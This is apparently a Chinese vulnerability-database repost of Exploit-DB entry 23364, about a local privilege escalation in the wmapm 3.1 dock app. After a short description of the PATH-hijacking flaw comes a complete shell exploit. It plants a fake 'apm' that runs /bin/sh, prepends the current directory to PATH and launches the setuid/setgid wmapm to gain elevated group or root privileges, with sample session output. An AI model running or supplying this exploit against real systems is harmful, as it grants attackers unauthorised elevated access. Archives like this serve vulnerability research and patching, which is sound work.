WMAPM 3.1 – Local Privilege Escalation

WMAPM 3.1 – Local Privilege Escalation

漏洞ID 1054239 漏洞类型
发布时间 2003-11-08 更新时间 2003-11-08
图片[1]-WMAPM 3.1 – Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-WMAPM 3.1 – Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23364
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8995/info

wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to.

#/bin/sh
# Pretty useless, we can mess up /etc/dumpdates or run shutdown
# on FreeBSD systems with wmapm from ports.
# If wmapm is installed from source we get root instead,
# so I suppose this might be worth something(uid 0) on linux.
# kokanin@dtors~ pkg_info | grep -i wmapm
# wmapm-3.1           Laptop battery status display for WindowMaker
# kokanin@dtors~ ls -la `which wmapm`    
# -rwxr-sr-x  1 root  operator  41892 Mar 23 10:00 /usr/X11R6/bin/wmapm
# kokanin@dtors~ sh DSR-wmapm.sh
# press the S button when wmapm starts
# $ /usr/bin/id
# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)
echo "/bin/sh" > apm
chmod +x ./apm
echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts"
export PATH=.:$PATH
/usr/X11R6/bin/wmapm
rm ./apm

相关推荐: .reg文件注册表漏洞

.reg文件注册表漏洞 漏洞ID 1207600 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0572 CNNVD-ID CNNVD-199701-014 漏洞平台 N/A CVSS评分 9.3…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享